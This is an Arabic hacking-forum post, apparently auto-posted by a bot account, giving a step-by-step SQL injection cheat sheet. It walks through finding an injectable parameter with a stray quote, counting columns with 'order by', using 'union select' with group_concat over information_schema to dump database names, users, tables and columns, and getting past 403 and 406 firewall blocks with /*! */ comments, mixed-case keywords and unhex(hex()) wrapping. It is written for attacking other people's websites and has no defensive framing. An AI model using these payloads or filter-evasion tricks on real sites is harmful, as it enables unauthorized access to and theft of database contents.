حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M

    السلام عليكم ورحمة الله وبركاته

    هذه اول مشاركاتي في المنتدى واتمنى الموضوع ينال رضاكم

    اليوم معنا :

    جميع أوامر


    SqL Injection

    أوامر تخطي


    Forbidden 403


    أوامر تخطي


    Not Acceptable


    أوامر التـشفــيــر أثناء الحقن


    أوامر تخطي عدم ظهور عدد الأعمدة


    ==============================
    أوامر SqL Injection
    ==============================
    أمر استخراج عدد الأعمدة
    ==============================
    +order+by+
    ==============================
    أمر استخراج العامود المصاب
    ==============================
    +union+select+
    ==============================
    أمر استخراج اسم قاعدة البيانات
    ==============================
    Database()
    ==============================
    أمر استخراج اصدار قاعدة البيانات
    ==============================
    Version()
    ==============================
    أمر استخراج يوزر قاعدة البيانات
    User()
    ==============================
    أمر استخراج الجداول
    ==============================
    يوضع هذا الأمر مكان العامود المصاب
    ==============================
    group_concat(table_name)
    ==============================
    ويوضع هذا الأمر في نهاية الرابط
    ==============================
    +from+information_schema.tables+where+table_schema =database()--
    ==============================
    أمر استخراج الأعمدة
    ==============================
    يوضع هذا الأمر مكان العامود المصاب
    ==============================
    group_concat(column_name)
    ==============================
    ويوضع هذا الأمر في نهاية الرابط
    ==============================
    +from+information_schema.columns+where+table_schem a=database()--
    ==============================
    أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة
    ==============================
    تخطي Forbidden 403 اثناء استخراج العامود المصاب
    ==============================
    اضافة الفلتر
    ==============================
    /*! */
    ==============================
    على كلمة
    ==============================
    select
    ==============================
    لتصبح بهذا الشكل
    ==============================
    /*!select*/
    ==============================
    واذا لم تنجح الطريقة العب بكلمة
    ==============================
    select
    ==============================
    لتصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    احرف سمول وأحرف كابتل
    ==============================
    تخطي Forbidden 403 اثناء استخراج الجداول
    ==============================
    التعديل بالأمر
    ==============================
    select
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    التعديل بالأمر
    ==============================
    group_concat(table_name)
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!GrOuP_CoNcAT(table_name)*/
    ==============================
    وتعديل الامر
    ==============================
    ليصبح بهذا الشكل
    ==============================
    +from+information_schema.tables+where+table_schema =database()--
    ==============================
    تخطي Forbidden 403 اثناء استخراج الجداول
    ==============================
    التعديل بالأمر
    ==============================
    select
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    التعديل بالأمر
    ==============================
    group_concat(column_name)
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!GrOuP_CoNcAT(column_name)*/
    ==============================
    وتعديل الامر
    ==============================
    ليصبح بهذا الشكل
    ==============================
    +from+information_schema.columns+where+table_schem a=database()--
    ==============================
    ليصبح بهذا الشكل
    ==============================
    +
    ==============================
    from+information_schema./*!columns*/+where+table_schema=database()--
    ==============================
    أوامر تخطي Not Acceptable
    ==============================
    تخطي Not Acceptable اثناء استخراج العامود المصاب
    ==============================
    اضافة الفلتر
    ==============================
    /*! */
    ==============================
    على كلمة
    ==============================
    select
    ==============================
    لتصبح بهذا الشكل
    ==============================
    /*!select*/
    ==============================
    واذا لم تنجح الطريقة العب بكلمة
    ==============================
    select
    ==============================
    لتصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    احرف سمول وأحرف كابتل
    ==============================
    تخطي
    Not Acceptable
    اثناء استخراج الجداول
    ==============================
    التعديل بالأمر
    ==============================
    select
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    التعديل بالأمر
    ==============================
    group_concat(table_name)
    ==============================
    ليصبح بالشكل دا
    ==============================
    /*!GrOuP_CoNcAT(table_name)*/
    ==============================
    تخطي Not Acceptable اثناء استخراج الجداول
    ==============================
    التعديل بالأمر
    ==============================
    select
    ==============================
    ليصبح بهذا الشكل
    ==============================
    /*!SeLeCt*/
    ==============================
    التعديل بالأمر
    ==============================
    group_concat(column_name)
    ==============================
    ليصبح بالشكل دا
    ==============================
    /*!GrOuP_CoNcAT(column_name)*/
    ==============================
    أوامر تخطي الحماية من بعض الأوامر
    ==============================
    هذا الأمر نضعه مكان العامود المصاب
    ==============================
    concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
    ==============================
    وهذا الأمر نضعه في نهاية الرابط
    ==============================
    +from+information_schema.columns--
    ==============================
    أوامر تخطي عدم ظهور عدد الأعمدة
    ==============================
    نقوم باضافة
    ==============================
    +--+
    ==============================
    في نهاية الرابط
    ==============================
    واضافة
    العلامة التي بين قوسين
    ==============================
    (')
    ==============================
    بعد
    ==============================
    .php?id=1
    ==============================
    ليصبح بهذا الشكل
    ==============================
    .php?id=1'
    ==============================
    هذه تكون نهاية الموضوع ارجو ان اكون قد وفقت بوضع الأوامر

    :{10}:​
    pwvdh ugn af;m uvhr jdl [ldu H,hlv SqL Injection jo'd Forbidden 403 Not Acceptable​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة